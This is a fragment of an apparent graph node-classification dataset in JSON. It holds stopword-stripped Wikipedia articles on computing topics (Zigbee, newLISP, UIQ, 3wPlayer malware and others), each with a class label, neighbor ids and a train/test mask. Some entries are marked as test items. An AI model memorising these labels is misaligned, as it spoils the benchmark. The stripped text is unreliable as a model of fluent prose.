    "text": "Zigbee:zigbee zigbee ieee 802.15.4-based specification suite high-level communication protocols used create personal area networks small low-power digital radios home automation medical device data collection low-power low-bandwidth needs designed small scale projects need wireless connection hence zigbee low-power low data rate close proximity i.e. personal area wireless ad hoc network technology defined zigbee specification intended simpler less expensive wireless personal area networks wpans bluetooth general wireless networking wi-fi applications include wireless light switches home energy monitors traffic management systems consumer industrial equipment requires short-range low-rate wireless data transfer low power consumption limits transmission distances 10–100 meters line-of-sight depending power output environmental characteristics zigbee devices transmit data long distances passing data mesh network intermediate devices reach distant ones zigbee typically used low data rate applications require long battery life secure networking zigbee networks secured 128 bit symmetric encryption keys zigbee defined rate 250 kbit/s best suited intermittent data transmissions sensor input device zigbee conceived 1998 standardized 2003 revised 2006 name refers waggle dance honey bees return beehive zigbee low-cost low-power wireless mesh network standard targeted battery-powered devices wireless control monitoring applications zigbee delivers low-latency communication zigbee chips typically integrated radios microcontrollers zigbee operates industrial scientific medical ism radio bands 2.4 ghz jurisdictions worldwide though devices also use 784 mhz china 868 mhz europe 915 mhz usa australia however even regions countries still use 2.4 ghz commercial zigbee devices home use data rates vary 20 kb/s 868 mhz band 250 kb/s 2.4 ghz band zigbee builds physical layer media access control defined ieee standard 802.15.4 low-rate wireless personal area networks wpans specification includes four additional key components network layer application layer zigbee device objects zdos manufacturer-defined application objects zdos responsible tasks including keeping track device roles managing requests join network well device discovery security zigbee network layer natively supports star tree networks generic mesh networking every network must one coordinator device within star networks coordinator must central node trees meshes allow use zigbee routers extend communication network level another defining feature zigbee facilities carrying secure communications protecting establishment transport cryptographic keys ciphering frames controlling device builds basic security framework defined ieee 802.15.4 zigbee-style self-organizing ad-hoc digital radio networks conceived 1990s ieee 802.15.4-2003 zigbee specification ratified december 14 2004 zigbee alliance announced availability specification 1.0 june 13 2005 known zigbee 2004 specification september 2006 zigbee 2006 specification announced obsoleting 2004 stack 2006 specification replaces message/key value pair structure used 2004 stack cluster library library set standardised commands organised groups known clusters names smart energy home automation zigbee light link january 2017 zigbee alliance renamed library dotdot announced new protocol represented emoticon || also announced additionally run network types using internet protocol interconnect standards thread since unveiling dotdot functioned default application layer almost zigbee devices zigbee pro also known zigbee 2007 finalized 2007 zigbee pro device may join operate legacy zigbee network vice versa due differences routing options zigbee pro devices must become non-routing zigbee end devices zeds legacy zigbee network legacy zigbee devices must become zeds zigbee pro network operates 2.4 ghz band also sub-ghz band zigbee protocols intended embedded applications requiring low power consumption tolerating low data rates resulting network use little power—individual devices must battery life least two years pass zigbee certification typical application areas include zigbee situations high mobility among nodes hence suitable tactical ad hoc radio networks battlefield high data rate high mobility present needed established 2002 zigbee alliance group companies maintain publish zigbee standard term zigbee registered trademark group single technical standard alliance publishes application profiles allow multiple oem vendors create interoperable products relationship ieee 802.15.4 zigbee similar ieee 802.11 wi-fi alliance years alliance membership grown 500 companies including likes comcast ikea legrand samsung smartthings amazon zigbee alliance three levels membership adopter participant promoter adopter members allowed access completed zigbee specifications standards participant members voting rights play role zigbee development early access specifications standards product development requirements membership zigbee alliance cause problems free software developers annual fee conflicts gnu general public licence requirements developers join zigbee alliance also conflict free software licenses zigbee alliance board asked make license compatible gpl refused bluetooth gpl licensed implementations first zigbee application profile home automation announced november 2 2007 additional application profiles since published specifications define internet protocol monitor control inform automate delivery use energy water enhancement zigbee smart energy version 1 specifications adds services plug-in electric vehicle charging installation configuration firmware download prepay services user information messaging load control demand response common information application profile interfaces wired wireless networks developed partners including zigbee smart energy relies zigbee ip network layer routes standard ipv6 traffic ieee 802.15.4 using 6lowpan header compression 2009 rf4ce radio frequency consumer electronics consortium zigbee alliance agreed deliver jointly standard radio frequency remote controls zigbee rf4ce designed broad range consumer electronics products tvs set-top boxes promised many advantages existing remote control solutions including richer communication increased reliability enhanced features flexibility interoperability line-of-sight barrier zigbee rf4ce specification lifts networking weight support mesh features traded smaller memory configurations lower cost devices remote control consumer electronics introduction second zigbee rf4ce application profile 2012 increased momentum mso market zigbee rf4ce team provides overview current status standard applications future technology radio design used zigbee analog stages uses digital circuits wherever possible though radios inexpensive zigbee qualification process involves full validation requirements physical layer radios derived validated semiconductor mask set would enjoy rf characteristics uncertified physical layer malfunctions could cripple battery lifespan devices zigbee network zigbee radios tight constraints power bandwidth thus radios tested guidance given clause 6 802.15.4-2006 standard products integrate radio microcontroller single module available standard specifies operation unlicensed 2.4 2.4835 ghz worldwide 902 928 mhz americas australia 868 868.6 mhz europe ism bands sixteen channels allocated 2.4 ghz band channel spaced 5 mhz apart though using 2 mhz bandwidth radios use direct-sequence spread spectrum coding managed digital stream modulator binary phase-shift keying bpsk used 868 915 mhz bands offset quadrature phase-shift keying oqpsk transmits two bits per symbol used 2.4 ghz band raw over-the-air data rate 250 kbit/s per channel 2.4 ghz band 40 kbit/s per channel 915 mhz band 20 kbit/s 868 mhz band actual data throughput less maximum specified bit rate due packet overhead processing delays indoor applications 2.4 ghz transmission distance may 10–20 depending construction materials number walls penetrated output power permitted geographical location outdoors line-of-sight range may 1500 depending power output environmental characteristics output power radios generally 0-20 dbm 1-100 mw zigbee devices three kinds current zigbee protocols support beacon non-beacon enabled networks non-beacon-enabled networks unslotted csma/ca channel access mechanism used type network zigbee routers typically receivers continuously active requiring robust power supply however allows heterogeneous networks devices receive continuously others transmit external stimulus detected typical example heterogeneous network wireless light switch zigbee node lamp may constantly receive since connected mains supply battery-powered light switch would remain asleep switch thrown switch wakes sends command lamp receives acknowledgment returns sleep network lamp node least zigbee router zigbee coordinator switch node typically zigbee end device beacon-enabled networks special network nodes called zigbee routers transmit periodic beacons confirm presence network nodes nodes may sleep beacons thus lowering duty cycle extending battery life beacon intervals depend data rate may range 15.36 milliseconds 251.65824 seconds 250 kbit/s 24 milliseconds 393.216 seconds 40 kbit/s 48 milliseconds 786.432 seconds 20 kbit/s however low duty cycle operation long beacon intervals requires precise timing conflict need low product cost general zigbee protocols minimize time radio reduce power use beaconing networks nodes need active beacon transmitted non-beacon-enabled networks power consumption decidedly asymmetrical devices always active others spend time sleeping except smart energy profile 2.0 zigbee devices required conform ieee 802.15.4-2003 low-rate wireless personal area network lr-wpan standard standard specifies lower protocol layers—the physical layer phy media access control portion data link layer dll basic channel access mode carrier sense multiple access/collision avoidance csma/ca nodes talk way humans converse briefly check see one talking start three notable exceptions beacons sent fixed timing schedule use csma message acknowledgments also use csma finally devices beacon-enabled networks low latency real-time requirements may also use guaranteed time slots gts definition use csma software designed easy develop small inexpensive microprocessors detail please use one sources listed references section go directly zigbee alliance web site using external links provided main functions network layer enable correct use mac sublayer provide suitable interface use next upper layer namely application layer capabilities structure typically associated network layers including routing network layer function exactly sounds deals network functions connecting disconnecting setting networks add network allocate addresses add/remove certain devices layer makes use star mesh tree topologies adds interface application layer one hand data entity creates manages network layer data units payload application-layer performs routing according current topology hand layer control used handle configuration new devices establish new networks determine whether neighboring device belongs network discovers new neighbors routers control also detect presence receiver allows direct communication mac synchronization routing protocol used network layer aodv aodv find destination device aodv broadcasts route request neighbors neighbors broadcast request neighbors onward destination reached destination reached sends route reply via unicast transmission following lowest cost path back source source receives reply update routing table destination address next hop path path cost application layer highest-level layer defined specification effective interface zigbee system end users comprises majority components added zigbee specification zdo management procedures together application objects defined manufacturer considered part layer layer binds tables sends messages bound devices manages group addresses reassembles packets also transports data responsible providing service zigbee device profiles zdo zigbee device object protocol zigbee protocol stack responsible overall device management security keys policies responsible defining role device either coordinator end device mentioned also discovery new one-hop devices network identification offered services may go establish secure links external devices reply binding requests accordingly application support sublayer aps main standard component layer offers well-defined interface control services works bridge network layer elements application layer keeps up-to-date binding tables form database used find appropriate devices depending services needed different devices offer union specified layers also routes messages across layers protocol stack application may consist communicating objects cooperate carry desired tasks focus zigbee distribute work among many different devices reside within individual zigbee nodes turn form network said work typically largely local device instance control household appliance collection objects form network communicates using facilities provided aps supervised zdo interfaces application layer data service follows typical request-confirm/indication-response structure within single device 240 application objects exist numbered range 1-240 0 reserved zdo data interface 255 broadcast 241-254 range currently use may future two services available application objects use zigbee 1.0 addressing also part application layer network node consists 802.15.4-conformant radio transceiver one device descriptions basically collections attributes polled set monitored events transceiver base addressing devices within node specified endpoint identifier range 1-240 applications communicate comprising devices must use common application protocol types messages formats sets conventions grouped profiles furthermore binding decided upon matching input output cluster identifiers unique within context given profile associated incoming outgoing data flow device binding tables contain source destination pairs depending available information device discovery may follow different methods network address known ieee address requested using unicast communication petitions broadcast ieee address part response payload end devices simply respond requested address network coordinator router also send addresses devices associated extended discovery protocol permits external devices find devices network services offer endpoints report queried discovering device previously obtained addresses matching services also used use cluster identifiers enforces binding complementary entities using binding tables maintained zigbee coordinators table must always available within network coordinators likely permanent power supply backups managed higher-level layers may needed applications binding requires established communication link exists whether add new node network decided according application security policies communication happen right association direct addressing uses radio address endpoint identifier whereas indirect addressing uses every relevant field address endpoint cluster attribute requires sent network coordinator maintains associations translates requests communication indirect addressing particularly useful keep devices simple minimize need storage besides two methods broadcast endpoints device available group addressing used communicate groups endpoints belonging set devices one defining features zigbee provides facilities carrying secure communications protecting establishment transport cryptographic keys cyphering frames controlling devices builds basic security framework defined ieee 802.15.4 part architecture relies correct management symmetric keys correct implementation methods security policies basic mechanism ensure confidentiality adequate protection keying material trust must assumed initial installation keys well processing security information implementation globally work general conformance specified behaviors assumed keys cornerstone security architecture protection paramount importance keys never supposed transported insecure channel momentary exception rule occurs initial phase addition network previously unconfigured device zigbee network model must take particular care security considerations ad hoc networks may physically accessible external devices also state working environment predicted within protocol stack different network layers cryptographically separated access policies needed conventional design assumed open trust model within device allows key sharing notably decreases potential cost nevertheless layer creates frame responsible security malicious devices may exist every network layer payload must ciphered unauthorized traffic immediately cut exception transmission network key confers unified security layer grid new connecting device zigbee uses 128-bit keys implement security mechanisms key associated either network usable zigbee layers mac sublayer link acquired pre-installation agreement transport establishment link keys based master key controls link key correspondence ultimately least initial master key must obtained secure medium transport pre-installation security whole network depends link master keys visible application layer different services use different one-way variations link key avoid leaks security risks key distribution one important security functions network secure network designate one special device devices trust distribution security keys trust center ideally devices center trust address initial master key preloaded momentary vulnerability allowed sent described typical applications without special security needs use network key provided trust center initially insecure channel communicate thus trust center maintains network key provides point-to-point security devices accept communications originating key supplied trust center except initial master key security architecture distributed among network layers follows security levels infrastructure based ccm* adds encryption- integrity-only features ccm according german computer magazine website zigbee home automation 1.2 using fallback keys encryption negotiation known changed makes encryption highly vulnerable network simulators like ns2 omnet++ opnet netsim used simulate ieee 802.15.4 zigbee networks simulators come open source c c++ libraries users modify way users determine validity new algorithms hardware implementation",
    "neighbors": [
      4609,
      11267,
      11396,
      3847,
      4359,
      8714,
      9098,
      10897,
      9365,
      5664,
      8736,
      5028,
      4773,
      10021,
      682,
      7341,
      7983,
      9779,
      7865,
      62,
      1221,
      2117,
      8262,
      4691,
      10206,
      479,
      5472,
      2030,
      7411,
      11383,
      11260,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 11268,
    "label": 7,
    "text": "SimPRO:simpro simpro private saas company provides cloud-based job project management software field service trade contracting industries company customers partners australia new zealand united kingdom united states simpro offices located countries recent opening operation colorado united states simpro founded 2002 electrical business owner steve bradshaw approached software engineering student vaughan mckillop creating website electrical contracting business mckillop explained bradshaw strengths lay writing software rather web design two men created simpro first iteration using web-based php mysql languages initially focused making digital job lists moved building scheduling tool could allocate time technicians mckillop bradshaw continued expand software capability functionality realised new tool could also offered customers company first started trading acorn software service management pty ltd 2003 changed name simpro software 2011 simpro 2017 february 2019 simpro board management executive team five members chief executive officer sean diljore chief operating officer chief financial officer alan bignell chief technology officer jonathan eastgate executive financial controller rhiza lahoylahoy chief learning development officer erika entz peter darley currently general manager simpro australia ricky sevta general manager simpro new zealand 2009 simpro launched united kingdom current general manager richard pratley previously managed new zealand office 2015 company opened location colorado united states effort grow presence local market current president glenn nott october 2016 simpro received usd 31 million capital funding new york-based growth equity firm level equity marked first time company accepted external investment since founding level equity partner benjamin levin principal charles chen sit simpro board directors 2013 simpro acquired vehicle fleet tracking management company simtrac aud 2.5 million designed help business managers monitor work vehicles road real time minimise travel times simpro key features include quoting estimating scheduling service project management inventory management asset maintenance invoicing payment processing integration accounting software designed eliminate double entry data provide transfer financial data assist financial reporting simpro mobile applications used smartphones tablets ios android operation systems keep remote staff connected office simpro connect app field users process payment job complete customer credit card simpro eforms app used digitise company existing paper forms use field simpro ’ add-ons include simpro software integrates range third-party applications cloud accounting software sage xero myob quickbooks among others",
    "neighbors": [
      4194,
      8644,
      7022,
      467,
      8627
    ],
    "mask": "Test"
  },
  {
    "node_id": 11269,
    "label": 9,
    "text": "NewLISP:newlisp newlisp scripting language dialect lisp family programming languages designed developed lutz mueller newlisp free open-source software released gnu general public license version 3 later newlisp design influenced two main lisp dialects common lisp scheme languages like pascal c. newlisp originated 1991 originally developed sun-4 workstation later moved windows 3.0 version 1.3 released compuserve around 1993 became available windows graphical user interface gui graphics-capable application dos console application 16-bit 1995 release windows 95 newlisp moved 32-bit april 1999 newlisp ported linux core algorithms rewritten windows-specific code removed newlisp released open-source software project licensed gpl development windows stopped version 6.0.25 first half 2001 newlisp ported back windows cygwin platform without graphics abilities second half 2001 cross-platform tcl/tk frontend named newlisp-tk released around version 6.3.0 2006 64-bit precision introduced integer arithmetic operations files version 9.0 since release 6.5 mid-2002 development active many new features added newlisp attempts provide fast powerful cross-platform full-featured scripting version language lisp using modest system resources data storage e.g. disk space memory provides lisp features lists symbol processing function mapping anonymous functions lambda expressions s-expressions excluding improper lists macros also provides functions expected modern scripting language including supporting regular expressions xml unicode utf-8 networking via transmission control protocol tcp internet protocol ip user datagram protocol udp matrix array processing advanced math statistics bayesian statistical analysis mathematical finance distributed computing newlisp runs operating systems berkeley software distribution bsd linux macos solaris windows supports mysql sqlite odbc database access common gateway interface cgi simple mail transfer protocol smtp post office protocol pop 3 file transfer protocol ftp xml remote procedure call xml-rpc run server mode daemon newlisp supports namespaces termed contexts assigned variables passed functions associated globally unique symbols limiting use first-class citizens objects prototype-based object-oriented style programming possible newlisp using contexts prototypes construct objects variables inside contexts interfere variables name contexts inside context variables behave according rules dynamic scoping newlisp uses dynamic scoping function called function see variables caller caller caller within context namespace supports explicitly implicitly defined local dynamic variables shadow variables name outer environment thus preventing accidental use change variables caller environment parameter variables called function automatically shadow caller variable environment globally variables grouped separate namespaces newlisp uses method automatic memory management different traditional garbage collection schemes termed one reference oro memory management variable referenced context context referenced globally sharing subobjects among objects cyclic structures multiple variables pointing object unsupported newlisp objects copied stored data structures passed functions except certain built-in functions exceptions symbols contexts shared instead copied thus used indirection symbols contexts globally named deleted explicitly deleting symbol context scans objects replace references codice_1 newlisp graphical user interface gui server newlisp-gs java-based internet protocol suite tcp/ip server providing graphical programming interface newlisp-gs based development environment included newlisp binary distributions gtk-server opengl tcl/tk-based programming interfaces available newlisp version allows building executable files portable applications deployment self-contained need installing newlisp import function allows importing functions dynamic-link library dll windows api win32 shared library linux unix web frameworks available newlisp include dragonfly rockets",
    "neighbors": [
      10752,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      2585,
      4122,
      4633,
      8226,
      5677,
      3119,
      9780,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      5754,
      7805,
      9345,
      1159,
      9865,
      6797,
      655,
      9877,
      11413,
      5803,
      10924,
      2225,
      692,
      9909,
      6840,
      7867,
      4799,
      7364,
      7880,
      8908,
      205,
      5837,
      219,
      5852,
      10463,
      7392,
      7904,
      9441,
      11488,
      11495,
      4331,
      5356,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      5380,
      3334,
      6919,
      3336,
      1801,
      10510,
      1301,
      5397,
      791,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      823,
      311,
      6969,
      8524,
      2895,
      3408,
      6994,
      1365,
      2392,
      5472,
      10083,
      6502,
      11625,
      5492,
      3446,
      10104,
      377,
      4992,
      8582,
      7562,
      5531,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      5546,
      9128,
      2485,
      9151,
      7616,
      5569,
      6594,
      4550,
      11218,
      11221,
      10712,
      3034,
      11226,
      479,
      3051,
      5611,
      5612,
      7670,
      11255,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 11270,
    "label": 2,
    "text": "Windows_DreamScene:windows dreamscene windows dreamscene utility allows videos .gif optimized animations used desktop wallpapers one windows ultimate extras windows vista prior official announcement dreamscene rumored creation names motion desktop borealis several months testing final version released september 25 2007 rendered content included dreamscene animated realization windows aurora background produced stardock photographic content provided discovery channel third-party video content mpeg wmv format may also used addition avi files played altering file extension additionally partnership dell microsoft released separate dreamscene alongside product red version ultimate edition windows vista one purported advantages dreamscene previous methods desktop animation makes use gpu display instead cpu leaving latter free perform user tasks extent achieved specified full-screen program run game window maximized video automatically stop since video seen means uses less gpu cpu video also stopped manually content encoders need strive balance compression file size decompression requires cpu larger files take memory may cause disk accessed frequently running video background would significant impact battery life mobile computers whether rendered gpu dreamscene may display static background computer running batteries software relies heavily desktop window manager dwm part windows aero stardock offers chargeable add-on windows dreamscene called deskscapes software allows implementation dynamic wallpapers .dream files released new version 3.5 makes program compatible non-ultimate editions vista newer versions windows 7 8 windows 7 dreamscene replaced desktop slideshow feature produces slideshow background wallpapers support videos however still enabled via third-party tools",
    "neighbors": [
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      10281,
      2101,
      10812,
      3648,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      10839,
      603,
      9819,
      8798,
      3170,
      5225,
      622,
      9839,
      4210,
      7796,
      7290,
      4731,
      10879,
      8841,
      2193,
      9874,
      10900,
      4248,
      9377,
      3235,
      4771,
      6820,
      1703,
      5300,
      2749,
      200,
      5324,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      3308,
      1776,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      10024,
      3881,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      6462,
      3394,
      3922,
      4439,
      5465,
      2402,
      4458,
      6506,
      1400,
      9593,
      2943,
      1418,
      5003,
      5004,
      11677,
      929,
      10658,
      11683,
      430,
      6062,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 11271,
    "label": 2,
    "text": "UIQ:uiq uiq formerly known user interface quartz software platform based upon symbian os created uiq technology essentially graphical user interface layer provides additional components core os enable development feature-rich mobile phones open expanded capabilities third-party applications uiq result 'quartz user interface pen pdas one three provisional interfaces designed symbian ltd first three quartz phones never made market including psion odin joint venture motorola cancelled january 2001 causing psion shares deteriorate engineers thereafter created lighter version software presented 2002 first shipped year sony ericsson p800 sony ericsson main oem using uiq platform products motorola also developed products using uiq abandoned platform 2003 favour linux along stake symbian ltd 2007 returned uiq launch motorola rizr z8 nokia using competing series 60 later s60 platform created one uiq device called nokia 6708 rebadged benq p31 released asia pacific region sony ericsson bought uiq technology november 2006 next year motorola bought half creation symbian foundation favouring s60 ui choice uiq future uncertain could longer develop software symbian os many motorola uiq devices planned 2009 cancelled including motorola razr3 codenamed ruby uiq technology filed bankruptcy january 2009 final nail coffin uiq platform sony ericsson moved windows mobile open source symbian foundation whilst motorola adopted google android software uiq 3.3 last version platform based upon symbian os v9.3 developers developed uiq 3.x platform much better story previous releases since uiq 3.x phones served single core sdk native applications written c++ using symbian/uiq sdk uiq-based phones 2.x 3.x also support java applications uiq phones employ touch screens resolution 208×320 pixels uiq 1.x 2.x 240×320 uiq 3.x depending phone color depth 12-bit 4096 colors 16-bit 65536 colors 18-bit 262144 colors 24-bit 16,777,216 colors newer phones developers significant items sony ericsson motorola benq nokia arima following list smartphones announced/confirmed running newer uiq 3.x platform pda-style design similar handheld computer hybrid pda/phone design candy-bar phone touchscreen display slider design",
    "neighbors": [
      6276,
      4364,
      3089,
      1687,
      7063,
      10393,
      11545,
      6301,
      5406,
      4383,
      673,
      4132,
      1833,
      3626,
      5290,
      5677,
      7727,
      3248,
      7857,
      9137,
      10674,
      10802,
      823,
      7991,
      9784,
      1083,
      1216,
      5824,
      6338,
      7617,
      7492,
      10053,
      199,
      11079,
      7246,
      2001,
      4305,
      2259,
      7253,
      3542,
      3162,
      6748,
      607,
      10080,
      2658,
      9443,
      8423,
      10215,
      3561,
      6505,
      6763,
      6508,
      2925,
      10599,
      495,
      1524,
      5369,
      8315,
      8316,
      8829,
      11391
    ],
    "mask": "None"
  },
  {
    "node_id": 11272,
    "label": 4,
    "text": "Microphone_blocker:microphone blocker microphone blocker device prohibits audio hacking form hardware accessory smartphone laptop pda similar device blocker intended disable internal microphone also android software name disables microphone microphone blocker also known mic blocker mic lock physically microphone blocker dummy plug inserted external microphone socket mobile device blocker disables signal internal microphone tricking device thinking external microphone already plugged successful operation microphone blocker depends internal scheme mobile device may fully block microphone without possibility recovering data disregard signal internal microphone possibility recording needed microphone blocker cheap simple accessory provides protection eavesdropping cellphone surveillance types audio hacking variety spyware programs turn mobile device microphone remotely vast majority devices internal hardware protection prevent eavesdropping anti-spying software guarantee microphone fully blocked disabled spyware malware constantly changing improving leaked documents published wikileaks codenamed vault 7 dated 2013 2016 described capabilities united states central intelligence agency cia perform electronic surveillance cyber warfare including ability compromise operating systems smartphones turning permanent listening devices millions smartphones could also vulnerable hacking via accelerometers new data access technique discovered research team israel ben-gurion university cybersecurity research center allows data extracted using computer speakers headphones forbes published report stating researches found way see information displayed using microphone 96.5 accuracy",
    "neighbors": [
      297,
      1083,
      9356,
      1070,
      10392,
      7515
    ],
    "mask": "None"
  },
  {
    "node_id": 11273,
    "label": 2,
    "text": "Android_Go:android go android go tailored android distribution low-end devices first unveiled android oreo intended devices 1 gb ram less mode platform optimizations designed reduce mobile data usage including enabling data saver mode default special suite google mobile services designed less resource- bandwidth-intensive google play services also modularized reduce memory footprint google play store highlight lightweight apps suited devices operating system interface differs mainline android quick-settings panel giving greater prominence information regarding battery mobile-data limit available storage recent apps menu using modified layout limited four apps order reduce ram consumption api allowing mobile carriers implement data-tracking top-ups within android settings menu android go made available oems android 8.1 later android pie",
    "neighbors": [
      5100,
      1516,
      7983,
      5397,
      7835,
      7548
    ],
    "mask": "None"
  },
  {
    "node_id": 11274,
    "label": 8,
    "text": "RSS_tracking:rss tracking rss tracking methodology tracking rss feeds rss feeds around since 1999 form internet marketing however unlike forms publishing information internet difficult track usage rss feeds feed tracking methods growing popularity currently many methods tracking rss feeds problems terms accuracy transparent 1×1 pixel images images embedded within content rss feed linking image held web server number requests made measured using web server log files give rough estimate many times rss feed viewed problem method rss feed aggregators display images parse html third-party services services available internet syndicate rss feed track requests made syndication rss feed services come free paid forms problem method analytical data feeds controlled service provider easily accessible transferable unique url per feed method requires heavy web server programming auto generate different rss feed url visitor website visitor rss feed activity tracked accurately using standard web analytics applications problem method feed syndicated search engine instance defeat purpose unique urls many people could potentially view rss feed via single url estimating number subscribers log files aggregators example bloglines google reader include number unique users whose behalf feed downloaded http request readers -- web browsers -- counted noting number unique ip addresses retrieve file given period provides estimate actual readership although probably higher real number people may sign accounts multiple aggregators never delete subscriptions may read feeds different computers computer may different ip address different times",
    "neighbors": [
      7488,
      3428,
      9325,
      10126,
      6576,
      7921,
      3350,
      119,
      11674,
      2076,
      10270
    ],
    "mask": "Test"
  },
  {
    "node_id": 11275,
    "label": 1,
    "text": "North_Atlantic_Population_Project:north atlantic population project north atlantic population project napp collaboration historical demographers britain canada denmark germany iceland norway sweden produce massive census microdata collection north atlantic region late-nineteenth century database includes complete individual-level census enumerations country provides information 110 million people large scale allows detailed analysis small geographic areas population subgroups napp database designed compatible integrated public use microdata series ipums disseminated ipums data-access system minnesota population center university minnesota major collaborators project include lisa dillon university montreal chad gaffield university ottawa ólöf garðarsdóttir statistics iceland marianne jarnes erikstad university tromsø jan oldervall university bergen evan roberts university minnesota steven ruggles university minnesota kevin schürer uk data archive gunnar thorvaldsen university tromsø matthew woollard uk data archive project also coordinated minnesota population center university minnesota",
    "neighbors": [
      480
    ],
    "mask": "None"
  },
  {
    "node_id": 11276,
    "label": 9,
    "text": "Enchanting_(programming_language):enchanting programming language enchanting free open-source cross-platform educational programming language designed program lego mindstorms nxt robots primarily developed southern alberta robotics enthusiasts group province alberta canada runs mac os x windows experimentally linux devices since 2013 enchanting version 0.2 available predecessor 1998 robotics invention system developed scratch developer team led mitch resnick mit media lab based byob developed university california berkeley current version enchanting runs windows xp windows vista windows 7 windows 8 windows 8 rt mac os x runs version 10.4 newer linux runs ubuntu version 10.10 used secondary-to-tertiary computer science program monash university australia interactive pdf book use computer ipad titled robotics enchanting lego® nxt available free download recent sabre games organized 2013 southern alberta robotics enthusiasts group consisted three disciplines tug war two robots tied together string tries pull opponent center line sumo two robots placed sumo ring tries find push opponent without going ring parade robots follow line trying crash robot front",
    "neighbors": [
      10964,
      6797,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 11277,
    "label": 2,
    "text": "SIS_(file_format):sis file format sis acronym stands software installation script standard software installation package format symbian os sis files archive containing installation instructions application file usually .app .exe file dependencies convention .sisx denotes signed file different ways sis file created basic approach create package definition file .pkg contains information package like vendor package name files include package use makesis signsis utilities processes .pkg file creates actual sis file alternatives use carbide.c++ ide automatically builds sis file part build process graphically define create installation package using packageforge windows utility siscontents able convert various file formats",
    "neighbors": [
      1216,
      4129,
      9356,
      7246,
      11184,
      3921,
      947,
      7253,
      1687,
      6748
    ],
    "mask": "Test"
  },
  {
    "node_id": 11278,
    "label": 4,
    "text": "3wPlayer:3wplayer 3wplayer malware disguises media player infect computers running microsoft windows designed exploit users download video files instructing download install program order view video 3wplayer employs form social engineering infect computers seemingly desirable video files recent movies released via bittorrent distribution channels files resemble conventional avi files engineered display message played media player programs instructing user visit 3wplayer website download software view video 3wplayer infected trojan.win32.obfuscated.en according symantec 3wplayer may download piece adware refer adware.lop adds toolbar search button internet explorer perl script posted online reportedly decrypt 3wplayer files back avi claim tested mixed results intended avi file rarely desired video file developers made application automatically identify 3wplayer encrypted files multiple 3wplayer clones divocodec divo codec x3codec also identified trojan similar 3wplayer users instructed download codec order view play avi/mp4/mp3/wma file often downloaded via p2p programs instead actual codecs divocodec installs malware users computer divocodec polymorphic change structure also known write another process virtual memory process hijacking domplayer similar divocodec 3wplayer users also instructed download player order view avi file divocodec false .avi easily spotted duration file usually lying 10–12 seconds one conclude chance file may film/tv series despite size file always case however many distributors recently begun falsifying file meta data display normal durations file sizes x3 player similar domplayer instructs users download player view avi file also circulated 5-second asf video disguised mp3 file instructing users install player",
    "neighbors": [
      8582,
      7851,
      6797,
      11539,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 11279,
    "label": 9,
    "text": "Datapoint's_Advanced_Systems_Language:datapoint advanced systems language dasl datapoint advanced systems language programming language compiler proprietary datapoint primarily influenced pascal c touches created early 1980s gene hughes compiler output assembly language typically processed peep-hole optimizer assembler linker reflecting name dasl used systems programming mainly vendor",
    "neighbors": [
      1952,
      477,
      8262,
      6664,
      8524,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 11280,
    "label": 1,
    "text": "Resources,_events,_agents_(accounting_model):resources events agents accounting model resources events agents rea model accounting system re-engineered computer age rea originally proposed 1982 william e. mccarthy generalized accounting model contained concepts resources events agents mccarthy 1982 rea popular model teaching accounting information systems ais rare business practice companies easily dismantle legacy data warehouse systems unwilling workday inc. ibm scalable architecture financial reporting reatechnology iso 15944-4 exceptions fallon polovina 2013 however shown rea also add value modelling current erp business processes providing tool increases understanding implementation underlying data model rea model gets rid many accounting objects necessary computer age visible debits credits—double-entry bookkeeping disappears rea system many general ledger accounts also disappear least persistent objects e.g. accounts receivable accounts payable computer generate accounts real time using source document records rea treats accounting system virtual representation actual business words creates computer objects directly represent real-world-business objects computer science terms rea ontology real objects included rea model objects contrast conventional accounting terms asset liability less directly tied real-world objects example conventional accounting asset goodwill rea resource separate rea model business process company business process roughly corresponds functional department function michael porter value chain examples business processes would sales purchases conversion manufacturing human resources financing heart rea model usually pair events linked exchange relationship typically referred duality relation one events usually represents resource given away lost represents resource received gained example sales process one event would sales —where goods given up—and would cash receipt cash received two events linked cash receipt occurs exchange sale vice versa duality relationship complex e.g. manufacturing process would often involve two events see dunn et al 2004 examples rea systems usually modeled relational databases entity-relationship diagrams though compulsory philosophy rea draws idea reusable design patterns though rea patterns used describe databases rather object oriented programs quite different 23 canonical patterns original designs pattern book gamma et al research rea emphasizes patterns e.g. hruby et al 2006 example basic rea pattern shown e-r diagram pattern extended encompass commitments promises engage transactions e.g. sales order policies constructs dunn et al 2004 provide good overview undergraduate level accounting majors hruby et al 2006 advanced reference computer scientists diagram extended rea pattern hruby et al 2006 rea continuing influence electronic commerce standard ebxml w. mccarthy actively involved standards committee competing xbrl gl standard however odds rea concept closely mimics double-entry book-keeping rea recognised open group og within togaf® standard industry standard enterprise framework one modelling tools useful modelling business processes sensorica world first open value network ovn specialized open innovation peer production hardware uses rea model basis network resource planning contribution/value accounting system nrp-vas nrp-vas created bob haugen collaboration sensorica ovn",
    "neighbors": [
      11646
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11281,
    "label": 4,
    "text": "Secure_state:secure state secure state information systems security term describe entities computer system divided subjects objects formally proven state transition preserves security moving one secure state another secure state thereby inductively proven system secure defined bell–lapadula model secure state built concept state machine set allowable states system transition one state another state defined transition functions system state defined secure permitted access modes subjects objects accordance security policy",
